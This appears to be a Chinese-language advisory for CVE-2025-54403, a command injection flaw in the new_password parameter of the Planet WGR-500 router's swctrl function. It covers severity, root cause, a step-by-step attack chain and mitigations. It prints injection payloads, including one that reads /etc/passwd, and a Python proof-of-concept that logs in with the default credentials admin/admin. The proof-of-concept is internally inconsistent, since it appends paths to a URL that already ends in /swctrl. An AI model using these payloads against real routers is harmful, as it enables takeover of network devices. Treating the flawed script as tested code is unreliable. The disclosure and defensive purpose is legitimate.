CVE-2025-54403：Planet WGR-500路由器swctrl功能命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-54403

漏洞类型

操作系统命令注入（OS Command Injection）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Planet WGR-500 路由器

漏洞概述

CVE-2025-54403是存在于Planet WGR-500路由器（固件版本v1.3411b190912）中swctrl功能模块的多个操作系统命令注入漏洞。该漏洞由思科Talos安全团队发现并报告，CVSS 3.1评分为8.8分，属于高危级别漏洞。

Planet WGR-500是一款无线路由器产品，其swctrl功能模块负责交换机控制相关的网络请求处理。漏洞存在于该模块对用户输入参数的处理过程中，攻击者可以通过构造特殊的网络请求，向`new_password`请求参数中注入恶意的操作系统命令。由于该路由器在处理网络请求时未对用户输入进行充分的过滤和验证，导致攻击者能够在路由器操作系统上执行任意命令。

该漏洞的利用条件相对宽松，攻击者只需要具备低权限认证（如默认或弱口令登录）即可通过网络远程发起攻击，无需用户交互。成功利用该漏洞后，攻击者可以在路由器上以高权限执行任意操作系统命令，从而完全控制设备。这可能导致路由器的配置被篡改、网络流量被窃听或劫持、设备被用作僵尸网络节点等严重后果。由于路由器通常处于网络的关键位置，一旦被攻破，可能对整个内部网络安全构成重大威胁。

技术细节

该漏洞的根本原因在于Planet WGR-500路由器swctrl功能模块在处理HTTP/HTTPS网络请求时，未对`new_password`参数进行充分的输入验证和过滤。具体而言，当用户通过web管理界面或API发送包含密码修改请求时，路由器后端处理程序将`new_password`参数的值直接传递给系统shell命令执行函数（如system()或exec()），而没有对特殊字符（如分号`;`、管道符`|`、反引号`` ` ``、美元符号`$()`等）进行转义或过滤。

攻击者可以通过在`new_password`参数值中注入恶意命令来实现远程代码执行。例如，构造如下payload：`password;id`或`password$(cat /etc/passwd)`等。路由器在拼接命令字符串并执行时，注入的命令将以root权限在路由器操作系统上运行。

利用条件包括：1）攻击者需要能够通过网络访问路由器的管理接口（通常为LAN侧或若WAN管理开启则为WAN侧）；2）需要具备低权限认证凭据（如普通用户账户或通过默认/弱口令登录）；3）无需用户交互。攻击向量为网络（AV:N），攻击复杂度低（AC:L），所需权限为低权限（PR:L），用户交互不需要（UI:N），对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H）。

攻击链分析

STEP 1

步骤1：信息收集与目标确认

攻击者通过网络扫描或已知信息确认目标使用Planet WGR-500路由器（固件版本v1.3411b190912），并确定其管理接口的网络地址。

STEP 2

步骤2：获取低权限认证凭据

攻击者通过默认口令、弱口令爆破、社会工程学或之前获取的泄露凭据等方式，获得路由器的低权限用户认证信息。

STEP 3

步骤3：登录路由器管理界面

攻击者使用获取的认证凭据登录路由器的web管理界面，建立有效的会话。

STEP 4

步骤4：构造恶意请求payload

攻击者构造针对swctrl功能的HTTP请求，在`new_password`参数中注入操作系统命令（如使用分号、管道符或反引号等shell元字符）。

STEP 5

步骤5：发送恶意网络请求

攻击者通过已认证的会话向路由器的swctrl端点发送包含恶意payload的网络请求，触发命令注入漏洞。

STEP 6

步骤6：任意命令执行与设备控制

路由器后端在未充分过滤的情况下执行注入的命令，攻击者以高权限执行任意操作系统命令，完全控制路由器设备。

STEP 7

步骤7：后续恶意活动

攻击者可进一步窃取网络流量、篡改路由配置、将设备纳入僵尸网络，或以此为跳板攻击内网其他设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-54403 - Planet WGR-500 swctrl Command Injection PoC
# Vulnerability: OS Command Injection via 'new_password' parameter
# Affected: Planet WGR-500 v1.3411b190912

import requests
import sys

TARGET_URL = "http://<router_ip>/swctrl"
USERNAME = "admin"
PASSWORD = "admin"  # Default or known low-privilege credentials

# Malicious payload injected into new_password parameter
# The injected command will be executed with root privileges
INJECTION_PAYLOAD = "test; id; #"

def exploit(target_url, username, password, payload):
    """
    Exploit OS command injection in swctrl functionality
    via the new_password request parameter.
    """
    session = requests.Session()

    # Step 1: Authenticate to the router (low privilege)
    login_url = f"{target_url}/login"
    login_data = {
        "username": username,
        "password": password
    }
    resp = session.post(login_url, data=login_data)
    print(f"[*] Login response status: {resp.status_code}")

    # Step 2: Send crafted request with command injection in new_password
    swctrl_url = f"{target_url}/swctrl"
    inject_data = {
        "new_password": payload,  # Command injection point
        "action": "change_password"
    }
    resp = session.post(swctrl_url, data=inject_data)
    print(f"[*] Injection response status: {resp.status_code}")
    print(f"[*] Response body: {resp.text}")

    return resp

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    exploit(target, USERNAME, PASSWORD, INJECTION_PAYLOAD)

影响范围

Planet WGR-500 v1.3411b190912

防御指南

临时缓解措施

在等待官方固件修复发布之前，建议采取以下临时缓解措施：1）立即修改路由器默认管理员密码为高强度密码，并定期更换；2）限制路由器管理界面的网络访问，仅允许可信内网IP访问管理端口（通常为80/443）；3）如非必要，禁用路由器的远程管理功能（WAN侧管理）；4）监控路由器的异常网络流量和系统日志，及时发现可疑活动；5）在网络层面部署入侵检测系统（IDS）来识别针对路由器管理接口的攻击行为；6）考虑将受影响设备隔离到独立VLAN中，限制其对核心网络的访问权限。